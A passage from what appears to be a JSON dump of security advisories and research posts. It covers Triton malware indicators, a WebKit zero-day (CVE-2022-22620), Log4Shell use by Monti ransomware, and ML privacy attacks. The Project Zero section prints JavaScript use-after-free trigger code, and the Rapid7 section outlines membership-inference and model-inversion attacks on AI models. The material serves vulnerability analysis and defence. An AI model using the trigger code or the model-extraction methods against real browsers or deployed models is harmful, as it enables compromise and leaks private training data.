TsBase.pyc\n * 66d39af5d61507cf7ea29e4b213f8d7dc9598bed: TsHi.pyc\n * a6357a8792e68b05690a9736bc3051cba4b43227: TsLow.pyc\n * 2262362200aa28b0eead1348cb6fda3b6c83ae01: crc.pyc\n * 9059bba0d640e7eeeb34099711ff960e8fbae655: repr.pyc\n * 6c09fec42e77054ee558ec352a7cd7bd5c5ba1b0: select.pyc\n * 25dd6785b941ffe6085dd5b4dbded37e1077e222: sh.pyc\n\n### References\n\n * [https://blog.schneider-electric.com/cyber-security/2018/08/07/one-year-after-triton-building-ongoing-industry-wide-cyber-resilience/](<https://ics-cert.us-cert.gov/sites/default/files/ICSJWG-Archive/QNL_DEC_17/Waterfall_top-20-attacks-article-d2%20-%20Article_S508NC.pdf>)\n * [https://www.youtube.com/watch?v=f09E75bWvkk](<https://ics-cert.us-cert.gov/sites/default/files/ICSJWG-Archive/QNL_DEC_17/Waterfall_top-20-attacks-article-d2%20-%20Article_S508NC.pdf>)\n * <https://ics-cert.us-cert.gov/sites/default/files/ICSJWG-Archive/QNL_DEC_17/Waterfall_top-20-attacks-article-d2%20-%20Article_S508NC.pdf>\n * <https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html>\n * <https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware>\n * <https://www.nozominetworks.com/2018/07/18/blog/new-triton-analysis-tool-wireshark-dissector-for-tristation-protocol/>\n * <https://github.com/NozomiNetworks/tricotools>\n * <https://cyberx-labs.com/en/blog/triton-post-mortem-analysis-latest-ot-attack-framework/>\n * <https://vimeo.com/275906105>\n * <https://vimeo.com/248057640>\n * <https://blog.talosintelligence.com/2017/07/template-injection.html>\n * <https://github.com/MDudek-ICS/TRISIS-TRITON-HATMAN>\n", "cvss3": {}, "published": "2018-11-08T00:00:00", "type": "trellix", "title": "Triton Malware Spearheads Latest Attacks on Industrial Systems | McAfee Blogs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-22620"], "modified": "2018-11-08T00:00:00", "id": "TRELLIX:4EE3028711C16E3513FC2CF300440452", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/triton-malware-spearheads-latest-generation-of-attacks-on-industrial-systems.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "hivepro": [{"lastseen": "2022-02-11T13:30:28", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here A third zero-day vulnerability has been identified since the latest zero-day bugs discovery in macOS Monterey in the year 2022. This flaw impacts the WebKit component, which is a cross-platform web browser engine that is predominantly used in Safari. This vulnerability tracked as CVE-2022-22620 exists due to a use-after-free error when processing HTML content in WebKit. The attacker can exploit this vulnerability by targeting users to visit a specially crafted web page. Once a user opens the malicious web page, the attacker can remotely execute malicious code on the targeted system. In case of an attack where code injection and execution is successful, the behavior of the target machine is entirely dependent on the intended purpose of the injected code. This vulnerability is been exploited in the wild and we suggest organizations upgrade to macOS Monterey 12.2.1. Potential MITRE ATT&amp;CK TTPs are: TA0001: Initial Access TA0002: Execution T1204: User Execution T1189: Drive-by Compromise T1190: Exploit-public facing application T1203: Exploitation for Client Execution T1204.001: User Execution: Malicious Link Vulnerability Details Patch Link https://support.apple.com/en-us/HT213092 References https://thehackernews.com/2022/02/apple-releases-ios-ipados-macos-updates.html", "cvss3": {}, "published": "2022-02-11T13:02:14", "type": "hivepro", "title": "Zero-day vulnerability in WebKit affects Apple macOS", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-22620"], "modified": "2022-02-11T13:02:14", "id": "HIVEPRO:2A4C96F3CDC5144909A1C1EA5E182515", "href": "https://www.hivepro.com/zero-day-vulnerability-in-webkit-affects-apple-macos/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-09-19T12:29:38", "description": "Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary The Monti ransomware infiltrated the client&#x27;s internet-facing VMware Horizon virtualization system by exploiting the well-known &quot;Log4Shell&quot; vulnerability, a.k.a. CVE-2021-44228. Furthermore, the threat actor employed a commercial, cloud-based remote monitoring and maintenance (RMM) platform named Action1, which has never been used in a ransomware campaign before.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-09-16T10:51:13", "type": "hivepro", "title": "Monti ransomware infiltrates networks via the well-known Log4Shell", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-09-16T10:51:13", "id": "HIVEPRO:753BDE83C1D82672DBEDB937144E1598", "href": "https://www.hivepro.com/monti-ransomware-infiltrates-networks-via-the-well-known-log4shell/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "googleprojectzero": [{"lastseen": "2023-11-27T15:02:49", "description": "Posted by Maddie Stone, Google Project Zero\n\nWhenever there\u2019s a new in-the-wild 0-day disclosed, I\u2019m very interested in understanding the root cause of the bug. This allows us to then understand if it was fully fixed, look for variants, and brainstorm new mitigations. This blog is the story of a \u201czombie\u201d Safari 0-day and how it came back from the dead to be disclosed as exploited in-the-wild in 2022. CVE-2022-22620 was initially fixed in 2013, reintroduced in 2016, and then disclosed as exploited in-the-wild in 2022. If you\u2019re interested in the full root cause analysis for CVE-2022-22620, we\u2019ve published it [here](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2022/CVE-2022-22620.html>).\n\nIn the [2020 Year in Review of 0-days exploited in the wild](<https://googleprojectzero.blogspot.com/2021/02/deja-vu-lnerability.html>), I wrote how 25% of all 0-days detected and disclosed as exploited in-the-wild in 2020 were variants of previously disclosed vulnerabilities. Almost halfway through 2022 and it seems like we\u2019re seeing a similar trend. Attackers don\u2019t need novel bugs to effectively exploit users with 0-days, but instead can use vulnerabilities closely related to previously disclosed ones. This blog focuses on just one example from this year because it\u2019s a little bit different from other variants that we\u2019ve discussed before. Most variants we\u2019ve discussed previously exist due to incomplete patching. But in this case, the variant was completely patched when the vulnerability was initially reported in 2013. However, the variant was reintroduced 3 years later during large refactoring efforts. The vulnerability then continued to exist for 5 years until it was fixed as an in-the-wild 0-day in January 2022.\n\n# Getting Started\n\nIn the case of CVE-2022-22620 I had two pieces of information to help me figure out the vulnerability: [the patch](<https://github.com/WebKit/WebKit/commit/486816dc355c19f1de1b8056f85d0bbf7084dd6e>) (thanks to Apple for sharing with me!) and [the description from the security bulletin](<https://support.apple.com/en-us/HT213093>) stating that the vulnerability is a use-after-free. The primary change in the patch was to change the type of the second argument (stateObject) to the function FrameLoader::loadInSameDocument from a raw pointer, SerializedScriptValue* to a reference-counted pointer, RefPtr&lt;SerializedScriptValue&gt;.\n\n[trunk/Source/WebCore/loader/FrameLoader.cpp](<https://trac.webkit.org/changeset/288539/webkit/trunk/Source/WebCore/loader/FrameLoader.cpp>)\n\n| \n\n| \n \n---|---|--- \n \n1094\n\n| \n\n1094\n\n| \n\n// This does the same kind of work that didOpenURL does, except it relies on the fact \n \n1095\n\n| \n\n1095\n\n| \n\n// that a higher level already checked that the URLs match and the scrolling is the right thing to do. \n \n1096\n\n| \n\n| \n\nvoid FrameLoader::loadInSameDocument(const URL&amp; url, SerializedScriptValue* stateObject, bool isNewNavigation) \n \n| \n\n1096\n\n| \n\nvoid FrameLoader::loadInSameDocument(URL url, RefPtr&lt;SerializedScriptValue&gt; stateObject, bool isNewNavigation) \n \nWhenever I\u2019m doing a root cause analysis on a browser in-the-wild 0-day, along with studying the code, I also usually search through commit history and bug trackers to see if I can find anything related. I do this to try and understand when the bug was introduced, but also to try and save time. (There\u2019s a lot of 0-days to be studied! \ud83d\ude00)\n\n# The Previous Life\n\nIn the case of CVE-2022-22620, I was scrolling through the [git ](<https://git-scm.com/docs/git-blame>)[blame](<https://git-scm.com/docs/git-blame>) view of FrameLoader.cpp. Specifically I was looking at the [definition of ](<https://github.com/WebKit/WebKit/blame/7b23cae2a1b1ffd026288f15261f8ba272c3b24b/Source/WebCore/loader/FrameLoader.cpp#L1096>)[loadInSameDocument](<https://github.com/WebKit/WebKit/blame/7b23cae2a1b1ffd026288f15261f8ba272c3b24b/Source/WebCore/loader/FrameLoader.cpp#L1096>). When looking at the git blame for this line prior to our patch, it\u2019s a very [interesting commit](<https://github.com/WebKit/WebKit/commit/aa31b6b4d09b09acdf1cec11f2f7f35bd362dd0e>). The commit was actually changing the stateObject argument from a reference-counted pointer, PassRefPtr&lt;SerializedScriptValue&gt;, to a raw pointer, SerializedScriptValue*. This change from December 2016 introduced CVE-2022-22620. The [Changelog even states](<https://github.com/WebKit/WebKit/commit/aa31b6b4d09b09acdf1cec11f2f7f35bd362dd0e#diff-9fb71b6fa7156160059b0216d05933e621d422df2b20f72ad7399eb946b8ba04>):\n\n \n(WebCore::FrameLoader::loadInSameDocument): Take a raw pointer for the\n\nserialized script value state object. No one was passing ownership.\n\nBut pass it along to statePopped as a Ref since we need to pass ownership\n\nof the null value, at least for now.\n\nNow I was intrigued and wanted to track down the previous commit that had changed the stateObject argument to PassRefPtr&lt;SerializedScriptValue&gt;. I was in luck and only had to go back in the history two more steps. There was a [commit from 2013](<https://github.com/WebKit/WebKit/commit/4b3be1d3a8d22cb2b2f5ddb8299f7cd25a21cebf>) that changed the stateObject argument from the raw pointer, SerializedScriptValue*, to a reference-counted pointer, PassRefPtr&lt;SerializedScriptValue&gt;. This commit from February 2013 was doing the same thing that our commit in 2022 was doing. The commit was titled \u201cUse-after-free in SerializedScriptValue::deserialize\u201d and included a good description of how that use-after-free worked.\n\nThe commit also included a test:\n\nAdded a test that demonstrated a crash due to use-after-free\n\nof SerializedScriptValue.\n\nTest: fast/history/replacestate-nocrash.html\n\nThe trigger from this test is:\n\nObject.prototype.__defineSetter__(\"foo\",function(){history.replaceState(\"\", \"\")});\n\nhistory.replaceState({foo:1,zzz:\"a\".repeat(1&lt;&lt;22)}, \"\");\n\nhistory.state.length; \n \n--- \n \nMy hope was that the test would crash the vulnerable version of WebKit and I\u2019d be done with my root cause analysis and could move on to the next bug. Unfortunately, it didn\u2019t crash.\n\nThe commit description included the comment to check out a Chromium bug. (During this time Chromium still used the WebKit rendering engine. Chromium forked[ the Blink rendering engine in April 2013](<https://blog.chromium.org/2013/04/blink-rendering-engine-for-chromium.html>).) I saw that my now Project Zero teammate, Sergei Glazunov, originally reported the [Chromium bug](<https://bugs.chromium.org/p/chromium/issues/detail?id=171839>) back in 2013, so I asked him for the details.\n\nThe use-after-free from 2013 (no CVE was assigned) was a bug in the implementation of the History API. This API allows access to (and modification of) a stack of the pages visited in the current frame, and these page states are stored as a SerializedScriptValue. The History API exposes a getter for state, and a method replaceState which allows overwriting the \"most recent\" history entry. \n \nThe bug was that in the implementation of the getter for state, SerializedScriptValue::deserialize was called on the current \"most recent\" history entry value without increasing its reference count. As SerializedScriptValue::deserialize could trigger a callback into user JavaScript, the callback could call replaceState to drop the only reference to the history entry value by replacing it with a new value. When the callback returned, the rest of SerializedScriptValue::deserialize ran with a free'd this pointer.\n\nIn order to fix this bug, it appears that the developers decided to change every caller of SerializedScriptValue::deserialize to increase the reference count on the stateObject by changing the argument types from a raw pointer to PassRefPtr&lt;SerializedScriptValue&gt;. While the originally reported trigger called deserialize on the stateObject through the V8History::stateAccessorGetter function, the developers\u2019 fix also caught and patched the path to deserialize through loadInSameDocument.\n\nThe timeline of the changes impacting the stateObject is:\n\n * [December 2009 - state object History API added.](<https://github.com/WebKit/WebKit/commit/e544495d282d4726fcb491e0e441ddba338b5ec1>)\n * HistoryItem.m_stateObject is type RefPtr&lt;SerializedScriptValue&gt;\n * HistoryItem::stateObject() returns SerializedScriptValue*\n * FrameLoader::loadInSameDocument takes stateObject argument as SerializedScriptValue*\n * [January 2013 - Patching Sergei\u2019s bug](<https://github.com/WebKit/WebKit/commit/4b3be1d3a8d22cb2b2f5ddb8299f7cd25a21cebf>)\n * HistoryItem::stateObject returns a PassRefPtr&lt;SerializedScriptValue&gt;\n * FrameLoader::loadInSameDocument takes stateObject argument as PassRefPtr&lt;SerializedScriptValue&gt;\n * [September 2015- Deprecating use of PassRefPtr in history directory](<https://github.com/WebKit/WebKit/commit/ec83a53b569f6c2b493e9874a498cd1b683656a1>)\n * HistoryItem::stateObject returns RefPtr instead of PassRefPtr\n * [October 2016 - (Potentially) ad-hoc refactoring ](<https://github.com/WebKit/WebKit/commit/ed43edee9f8f114c3b2db3c0420e23f926a968ee>)\n * HistoryItem::stateObject() is changed to return raw pointer instead of RefPtr\n * [December 2016 - CVE-2022-22600 introduced](<https://github.com/WebKit/WebKit/commit/aa31b6b4d09b09acdf1cec11f2f7f35bd362dd0e>)\n * FrameLoader::loadInSameDocument changed to take stateObject as a raw pointer instead of PassRefPtr&lt;SerializedScriptValue&gt;\n * [January 2022 - CVE-2022-22600 patched](<https://github.com/WebKit/WebKit/commit/486816dc355c19f1de1b8056f85d0bbf7084dd6e>)\n * FrameLoader::loadInSameDocument changed to take stateObject as a RefPtr&lt;SerializedScriptValue&gt;\n\n# The Autopsy\n\nWhen we look at the timeline of changes for FrameLoader::loadInSameDocument it seems that the bug was re-introduced in December 2016 due to refactoring. The question is, why did the patch author think that loadInSameDocument would not need to hold a reference. From the [December 2016 commit ChangeLog](<https://github.com/WebKit/WebKit/commit/aa31b6b4d09b09acdf1cec11f2f7f35bd362dd0e>): Take a raw pointer for the serialized script value state object. No one was passing ownership.\n\nMy assessment is that it\u2019s due to the October 2016 changes in HistoryItem:stateObject. When the author was evaluating the refactoring changes needed in the dom directory in December 2016, it would have appeared that the only calls to loadInSameDocument passed in either a null value or the result of stateObject() which as of October 2016 now passed a raw SerializedScriptValue* pointer. When looking at those two options for the type of an argument, then it\u2019s potentially understandable that the developer thought that loadInSameDocument did not need to share ownership of stateObject.\n\nSo why then was HistoryItem::stateObject\u2019s return value changed from a RefPtr to a raw pointer in October 2016? That I\u2019m struggling to find an explanation for. \n\nAccording to the description, the patch in October 2016 was intended to \u201cReplace all uses of ExceptionCodeWithMessage with WebCore::Exception\u201d. However when we look at the ChangeLog it seems that the author decided to also do some (seemingly unrelated) refactoring to HistoryItem. These are some of the only changes in the commit whose descriptions aren\u2019t related to exceptions. As an outsider looking at the commits, it seems that the developer by chance thought they\u2019d do a little \u201cclean-up\u201d while working through the required refactoring on the exceptions. If this was simply an additional ad-hoc step while in the code, rather than the goal of the commit, it seems plausible that the developer and reviewers may not have further traced the full lifetime of HistoryItem::stateObject.\n\nWhile the change to HistoryItem in October 2016 was not sufficient to introduce the bug, it seems that that change likely contributed to the developer in December 2016 thinking that loadInSameDocument didn\u2019t need to increase the reference count on the stateObject.\n\nBoth the October 2016 and the December 2016 commits were very large. The commit in October changed 40 files with 900 additions and 1225 deletions. The commit in December changed 95 files with 1336 additions and 1325 deletions. It seems untenable for any developers or reviewers to understand the security implications of each change in those commits in detail, especially since they\u2019re related to lifetime semantics.\n\n# The Zombie\n\nWe\u2019ve now tracked down the evolution of changes to fix the 2013 vulnerability\u2026and then revert those fixes\u2026 so I got back to identifying the 2022 bug. It\u2019s the same bug, but triggered through a different path. That\u2019s why the 2013 test case wasn\u2019t crashing the version of WebKit that should have been vulnerable to CVE-2022-22620:\n\n 1. The 2013 test case triggers the bug through the V8History::stateAccessorAndGetter path instead of FrameLoader::loadInSameDocument, and\n 2. As a part of Sergei\u2019s 2013 bug report there were additional hardening measures put into place that prevented user-code callbacks being processed during deserialization.\n\nTherefore we needed to figure out how to call loadInSameDocument and instead of using the deserialization to trigger a JavaScript callback, we needed to find another event in the loadInSameDocument function that would trigger the callback to user JavaScript.\n\nTo quickly figure out how to call loadInSameDocument, I modified the WebKit source code to trigger a test failure if loadInSameDocument was ever called and then ran all the tests in the fast/history directory. There were 5 out of the 80 tests that called loadInSameDocument:\n\n * [fast/history/multiple-back-forward-navigations.html](<https://github.com/WebKit/WebKit/blob/main/LayoutTests/fast/history/multiple-back-forward-navigations.html>)\n * [fast/history/history-traversal-is-asynchronous.html](<https://github.com/WebKit/WebKit/blob/main/LayoutTests/fast/history/history-traversal-is-asynchronous.html>)\n * [fast/history/history-back-forward-within-subframe-hash.html](<https://github.com/WebKit/WebKit/blob/main/LayoutTests/fast/history/history-back-forward-within-subframe-hash.html>)\n * [fast/history/link-inside-any.html](<https://github.com/WebKit/WebKit/blob/main/LayoutTests/fast/history/link-inside-any.html>)\n * [fast/history/timed-refresh-in-cached-frame.html](<https://github.com/WebKit/WebKit/blob/main/LayoutTests/fast/history/timed-refresh-in-cached-frame.html>)\n\nThe tests history-back-forward-within-subframe-hash.html and fast/history/history-traversal-is-asynchronous.html were the most helpful. We can trigger the call to loadInSameDocument by setting the history stack with an object whose location is the same page, but includes a hash. We then call history.back() to go back to that state that includes the URL with the hash. loadInSamePage is responsible for scrolling to that location.\n\nhistory.pushState(\"state1\", \"\", location + \"#foo\");\n\nhistory.pushState(\"state2\", \"\"); // current state\n\nhistory.back(); //goes back to state1, triggering loadInSameDocument \n \n--- \n \nNow that I knew how to call loadInSameDocument, I teamed up with Sergei to identify how we could get user code execution sometime during the loadInSameDocument function, but prior to the call to statePopped ([FrameLoader.cpp#1158](<https://github.com/WebKit/WebKit/blob/7b23cae2a1b1ffd026288f15261f8ba272c3b24b/Source/WebCore/loader/FrameLoader.cpp#L1158>)):\n\nm_frame.document()-&gt;statePopped(stateObject ? Ref&lt;SerializedScriptValue&gt; { *stateObject } : SerializedScriptValue::nullValue()); \n \n--- \n \nThe callback to user code would have to occur prior to the call to statePopped because stateObject was cast to a reference there and thus would now be reference-counted. We assumed that this would be the place where the \u201cfreed\u201d object was \u201cused\u201d.\n\nIf you go down the rabbit hole of the calls made in loadInSameDocument, we find that there is a path to the blur event being dispatched. We could have also used a tool like [CodeQL](<https://codeql.github.com/>) to see if there was a path from loadInSameDocument to dispatchEvent, but in this case we just used manual auditing. The call tree to the blur event is:\n\nFrameLoader::loadInSameDocument\n\nFrameLoader::scrollToFragmentWithParentBoundary\n\nFrameView::scrollToFragment\n\nFrameView::scrollToFragmentInternal\n\nFocusController::setFocusedElement\n\nFocusController::setFocusedFrame\n\ndispatchWindowEvent(Event::create(eventNames().blurEvent, Event::CanBubble::No, Event::IsCancelable::No)); \n \n--- \n \nThe blur event fires on an element whenever focus is moved from that element to another element. In our case loadInSameDocument is triggered when we need to scroll to a new location within the current page. If we\u2019re scrolling and therefore changing focus to a new element, the blur event is fired on the element that previously had the focus. \n\nThe last piece for our trigger is to free the stateObject in the onblur event handler. To do that we call replaceState, which overwrites the current history state with a new object. This causes the final reference to be dropped on the stateObject and it\u2019s therefore free\u2019d. loadInSameDocument still uses the free\u2019d stateObject in its call to statePopped.\n\ninput = document.body.appendChild(document.createElement(\"input\"));\n\na = document.body.appendChild(document.createElement(\"a\"));\n\na.id = \"foo\";\n\nhistory.pushState(\"state1\", \"\", location + \"#foo\");\n\nhistory.pushState(\"state2\", \"\");\n\nsetTimeout(() =&gt; {\n\ninput.focus();\n\ninput.onblur = () =&gt; history.replaceState(\"state3\", \"\");\n\nsetTimeout(() =&gt; history.back(), 1000);\n\n}, 1000); \n \n--- \n \nIn both the 2013 and 2022 cases, the root vulnerability is that the stateObject is not correctly reference-counted. In 2013, the developers did a great job of patching all the different paths to trigger the vulnerability, not just the one in the submitted proof-of-concept. This meant that they had also killed the vulnerability in loadInSameDocument. The refactoring in December 2016 then revived the vulnerability to enable it to be exploited in-the-wild and re-patched in 2022.\n\n# Conclusion\n\nUsually when we talk about variants, they exist due to incomplete patches: the vendor doesn\u2019t correctly and completely fix the reported vulnerability. However, for CVE-2022-22620 the vulnerability was correctly and completely fixed in 2013. Its fix was just regressed in 2016 during refactoring. We don\u2019t know how long an attacker was exploiting this vulnerability in-the-wild, but we do know that the vulnerability existed (again) for 5 years: December 2016 until January 2022.\n\nThere\u2019s no easy answer for what should have been done differently. The developers responding to the initial bug report in 2013 followed a lot of best-practices: \n\n * Patched all paths to trigger the vulnerability, not just the one in the proof-of-concept. This meant that they patched the variant that would become CVE-2022-22620.\n * Submitted a test case with the patch.\n * Detailed commit messages explaining the vulnerability and how they were fixing it.\n * Additional hardening measures during deserialization.\n\nAs an offensive security research team, we can make assumptions about what we believe to be the core challenges facing modern software development teams: legacy code, short reviewer turn-around expectations, refactoring and security efforts are generally under-appreciated and under-rewarded, and lack of memory safety mitigations. Developers and security teams need time to review patches, especially for security issues, and rewarding these efforts, will make a difference. It also will save the vendor resources in the long run. In this case, 9 years after a vulnerability was initially triaged, patched, tested, and released, the whole process had to be duplicated again, but this time under the pressure of in-the-wild exploitation. \n\nWhile this case study was a 0-day in Safari/WebKit, this is not an issue unique to Safari. Already in 2022, we\u2019ve seen in-the-wild 0-days that are variants of previously disclosed bugs targeting Chromium, Windows, Pixel, and iOS as well. It\u2019s a good reminder that as defenders we all need to stay vigilant in reviewing and auditing code and patches. \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-14T00:00:00", "type": "googleprojectzero", "title": "\nAn Autopsy on a Zombie In-the-Wild 0-day\n", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22600", "CVE-2022-22620"], "modified": "2022-06-14T00:00:00", "id": "GOOGLEPROJECTZERO:A395083F123D276DEBD13E65116FEA09", "href": "https://googleprojectzero.blogspot.com/2022/06/an-autopsy-on-zombie-in-wild-0-day.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2022-01-14T15:27:09", "description": "\n\n_**Editor\u2019s note: **We had planned to publish our _[_Hacky Holidays_](<https://www.rapid7.com/blog/series/hacky-holidays/hacky-holidays-2021/>)_ blog series throughout December 2021 \u2013 but then _[_Log4Shell_](<https://www.rapid7.com/blog/post/2021/12/15/the-everypersons-guide-to-log4shell-cve-2021-44228/>)_ happened, and we dropped everything to focus on this major vulnerability that impacted the entire cybersecurity community worldwide. Now that it\u2019s 2022, we\u2019re feeling in need of some holiday cheer, and we hope you\u2019re still in the spirit of the season, too. Throughout January, we\u2019ll be publishing Hacky Holidays content (with a few tweaks, of course) to give the new year a festive start. So, grab an eggnog latte, line up the carols on Spotify, and let\u2019s pick up where we left off._\n\nSanta\u2019s task of making the nice and naughty list has gotten a lot harder over time. According to estimates, there are around [2.2 billion children in the world](<https://www.humanium.org/en/children-world/>). That\u2019s a lot of children to make a list of, much less check it twice! So like many organizations with big data problems, Santa has turned to machine learning to help him solve the issue and built a classifier using historical naughty and nice lists. This makes it easy to let the algorithm decide whether they\u2019ll be getting the gifts they\u2019ve asked for or a lump of coal.\n\n\n\nSanta\u2019s lists have long been a jealously guarded secret. After all, being on the naughty list can turn one into a social pariah. Thus, Santa has very carefully protected his training data \u2014 it\u2019s locked up tight. Santa has, however, made his model\u2019s API available to anyone who wants it. That way, a parent can check whether their child is on the nice or naughty list.\n\nSanta, being a just and equitable person, has already asked his data elves to tackle issues of [algorithmic bias](<https://en.wikipedia.org/wiki/Algorithmic_bias>). Unfortunately, these data elves have overlooked some issues in machine learning security. Specifically, the issues of membership inference and model inversion.\n\n## Membership inference attacks\n\nMembership inference is a class of machine learning attacks that allows a naughty attacker to query a model and ask, in effect, \u201cWas this example in your training data?\u201d Using the techniques of [Salem et al.](<https://arxiv.org/abs/1806.01246>) or a tool like [PrivacyRaven](<https://github.com/trailofbits/PrivacyRaven>), an attacker can train a model that figures out whether or not a model has seen an example before.\n\n\n\nFrom a technical perspective, we know that there is some amount of memorization in models, and so when they make their predictions, they are more likely to be confident on items that they have seen before \u2014 in some ways, \u201cmemorizing\u201d examples that have already been seen. We can then create a dataset for our \u201cshadow\u201d model \u2014 a model that approximates Santa\u2019s nice/naughty system, trained on data that we\u2019ve collected and labeled ourselves.\n\nWe can then take the training data and label the outputs of this model with a \u201cTrue\u201d value \u2014 it was in the training dataset. Then, we can run some additional data through the model for inference and collect the outputs and label it with a \u201cFalse\u201d value \u2014 it was not in the training dataset. It doesn\u2019t matter if these in-training and out-of-training data points are nice or naughty \u2014 just that we know if they were in the \u201cshadow\u201d training dataset or not. Using this \u201cshadow\u201d dataset, we train a simple model to answer the yes or no question: \u201cWas this in the training data?\u201d Then, we can turn our naughty algorithm against Santa\u2019s model \u2014 \u201cDear Santa, was this in your training dataset?\u201d This lets us take real inputs to Santa\u2019s model and find out if the model was trained on that data \u2014 effectively letting us de-anonymize the historical nice and naughty lists!\n\n## Model inversion\n\nNow being able to take some inputs and de-anonymize them is fun, but what if we could get the model to just tell us all its secrets? That\u2019s where model inversion comes in! [Fredrikson_ et al_.](<https://www.cs.cmu.edu/~mfredrik/papers/fjr2015ccs.pdf>) proposed model inversion in 2015 and really opened up the realm of possibilities for extracting data from models. Model inversion seeks to take a model and, as the name implies, turn the output we can see into the training inputs. Today, extracting data from models has been done at scale by the likes of [Carlini et al_._](<https://www.usenix.org/system/files/sec21-carlini-extracting.pdf>), who have managed to extract data from large language models like GPT-2.\n\n\n\nIn model inversion, we aim to extract memorized training data from the model. This is easier with generative models than with classifiers, but a classifier can be used as part of a larger model called a Generative Adversarial Network (GAN). We then sample the generator, requesting text or images from the model. Then, we use the membership inference attack mentioned above to identify outputs that are more likely to belong to the training set. We can iterate this process over and over to generate progressively more training set-like outputs. In time, this will provide us with memorized training data.\n\nNote that model inversion is a much heavier lift than membership inference and can\u2019t be done against all models all the time \u2014 but for models like Santa\u2019s, where the training data is so sensitive, it\u2019s worth considering how much we might expose! To date, model inversion has only been conducted in lab settings on models for text generation and image classification, so whether or not it could work on a binary classifier like Santa\u2019s list remains an open question.\n\n## Mitigating model mayhem\n\nNow, if you\u2019re on the other side of this equation and want to help Santa secure his models, there are a few things we can do. First and foremost, we want to log, log, log! In order to carry out the attacks, the model \u2014 or a very good approximation \u2014 needs to be available to the attacker. If you see a suspicious number of queries, you can filter IP addresses or rate limit. Additionally, limiting the return values to merely \u201cnaughty\u201d or \u201cnice\u201d instead of returning the probabilities can make both attacks more difficult.\n\nFor extremely sensitive applications, the use of differential privacy or optimizing with [DPSGD](<https://arxiv.org/abs/1607.00133>) can also make it much more difficult for attackers to carry out their attacks, but be aware that these techniques come with some accuracy loss. As a result, you may end up with some nice children on the naughty list and a naughty hacker on your nice list.\n\nSanta making his list into a model will save him a whole lot of time, but if he\u2019s not careful about how the model can be queried, it could also lead to some less-than-jolly times for his data. Membership inference and model inversion are two types of privacy-related attacks that models like this may be susceptible to. As a best practice, Santa should:\n\n * Log information about queries like: \n * IP address\n * Input value\n * Output value\n * Time\n * Consider differentially private model training\n * Limit API access\n * Limit the information returned from the model to label-only\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe\n\n \n\n\n****************More Hacky Holidays blogs****************\n\n * [The 2021 Naughty and Nice Lists: Cybersecurity Edition](<https://www.rapid7.com/blog/post/2022/01/10/the-2021-naughty-and-nice-lists-cybersecurity-edition/>)\n * [2022 Cybersecurity Predictions: The Experts Clear Off the Crystal Ball](<https://www.rapid7.com/blog/post/2022/01/06/2022-cybersecurity-predictions-the-experts-clear-off-the-crystal-ball/>)\n * [Rapid7 2021 Wrap-Up: Highlights From a Year of Empowering the Protectors](<https://www.rapid7.com/blog/post/2022/01/05/rapid7-2021-wrap-up-highlights-from-a-year-of-empowering-the-protectors/>)\n * [Metasploit 2021 Annual Wrap-Up](<https://www.rapid7.com/blog/post/2022/01/05/metasploit-2021-annual-wrapup/>)\n * [5 Security Projects That Are Giving Back](<https://www.rapid7.com/blog/post/2022/01/04/5-security-projects-that-are-giving-back/>)\n * [Sharing the Gifts of Cybersecurity \u2013 Or, a Lesson From My First Year Without Santa](<https://www.rapid7.com/blog/post/2022/01/03/sharing-the-gifts-of-cybersecurity-or-a-lesson-from-my-first-year-without-santa/>)\n * [Hacky Holidays: Celebrating the Best of Security Nation 